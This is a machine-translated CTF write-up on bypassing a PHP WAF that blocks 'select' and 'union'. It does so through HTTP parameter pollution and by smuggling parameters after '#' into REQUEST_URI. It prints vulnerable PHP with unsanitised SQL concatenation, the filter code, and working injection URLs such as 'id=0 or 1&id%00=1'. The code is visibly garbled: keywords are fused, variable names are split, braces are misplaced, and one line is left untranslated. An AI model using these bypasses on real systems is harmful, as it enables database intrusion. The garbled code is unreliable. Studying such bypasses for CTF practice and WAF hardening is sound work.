PHP's two features cause WAF to bypass injection (interesting knowledge points) ____php

1, HPP http parameter Pollution http parameter pollution means that the server side usually does some processing when submitting two parameters of the same key value in the URL. For example, Apache is going to take the last argument, for example: user.php?id=111&id=222 If you output a $_get array, the ID's value will only take 222, i.e. the extra value submitted on the URL overrides the previous value.
2, a CTF topic http://drops.wooyun.org/tips/17248

About the injected WAF bypass, the injection point is:

$sql = "SELECT * from user where id=". $_request["id"]. ";";

You can see the request for delivery, and the following WAF code exists:

Functionwaf ($STR) {if (Stripos ($STR, select)!==false) die ("Be a good person!");
    if (Stripos ($STR, "union")!==false) Die ("Be a good person!");  
 
......
}
        Functionwafarr ($arr) {foreach ($arras $k=> $v) {WAF ($k);
    WAF ($v);
} wafarr ($_get);
Wafarr ($_post);
Wafarr ($_cookie); 
 
Wafarr ($_session);
    Functionstripstr ($STR) {if (GET_MAGIC_QUOTES_GPC ()) $str = Stripslashes ($STR);
Returnaddslashes (Htmlspecialchars ($str, ent_quotes, ' UTF-8 '));
$uri = Explode ("?", $_server[' Request_uri '));
    if (Isset ($uri [1])) {$parameter = Explode ("&", $uri [1]);
        foreach ($parameteras $k=> $v) {$v 1= explode ("=", $v);
        if (Isset ($v 1[1])) {$_request[$v 1[0]] = stripstr ($v 1[1));
    }} Functionstriparr ($arr) {$new _arr= array ();
    foreach ($arras $k=> $v) {$new _arr[stripstr ($k)] = Stripstr ($v);
} Return$new_arr;
} $_get=striparr ($_get);
$_post=striparr ($_post); $_cookie=striparr ($_cookie); $_session=striparr ($_session);

Here, the WAF function is used to filter the Get POST session cookie data and to escape these global arrays. It is noteworthy that here the $_request is in the code in accordance with the $_server[' Request_uri '] stitching, in the stitching process to escape the value of the parameter. (1) Thinking 1 using the HPP feature seems unlikely to be injected, but it can be implemented using HPP. Sample code:

User.php?id=0 or 1&id%00=1
user.php?id=0 or 1&%20id=1
user.php?id=0 or 1?&id=1

Test code:

<?php 

function Striparr ($arr) {
    $new _arr = Array ();
    foreach ($arr as $k => $v) {
        $new _arr[stripstr ($k)] = Stripstr ($v);
    return $new _arr;
}

function Stripstr ($str) {
    if (GET_MAGIC_QUOTES_GPC ())
        $str = Stripslashes ($STR);
    Return Addslashes (Htmlspecialchars ($str, ent_quotes, ' UTF-8 '));
}

$uri = Explode ("?", $_server[' Request_uri '));
if (Isset ($uri [1])) {
    $parameter = explode ("&", $uri [1]);
    foreach ($parameter as $k => $v) {
        $v 1 = explode ("=", $v);
        if (Isset ($v 1[1])) {
            $_request[$v 1[0]] = STRIPSTR ($v 1[1]);
}} Var_dump ($_get);

Var_dump ($_request);

? >

Output results:

As you can see, the get array here takes the last value, does not trigger the WAF, and the request data, the ID is our injection statement, so we can take advantage of the difference between the two, we could bypass the detection of the WAF function and use the previous injection point to implement the injection.
(2) Idea 2: Use the # feature ($_server[' Request_uri ']) in the browser, is not the # after the hash content sent to the server, where the use of the burp contract, you can send the contents of the hash to the server, such as sending:/#?id=1 Where the get array is empty, the request is output to/#?id=1, so that you can bypass the WAF function's judgment of the Got array, and carry the injected statement in the request (mainly because the request array is reorganized using the Request_uri). Bypassed the WAF detection.

3, the summary of this feature caused by the vulnerability scene is relatively special, first of all, CTF simulation of the scene is the WAF function only to get,post,session,cookies global array processing, injection point for request, in the scene, the code to the request array through $_ server[' Request_uri ', which is reassembled using & segmentation, may be due to the programmer trying to escape the REQUEST array or some cleanup to add it in. Use: (1) HPP characteristics, submit duplicate parameter content, PHP processing parameters will be overwritten, but the program splicing will be different, such as submit: http://127.0.0.1/shell.php?id=0 or 1&id%00=1 get for id= 1,request is:

  ' id ' => ' 0%20or%201 ' (length=10)
  ' id%00 ' => ' 1 ' (length=1)

As you can see, the injected content is successfully introduced into the request array. (2) Use the # symbol, #后面的内容不会带入至GET数组中, but will appear in the Request_uri, so you can use this feature to bring the injection statement into the request object. All in all, the vulnerability scenario that this feature causes is rather special, but it's really interesting.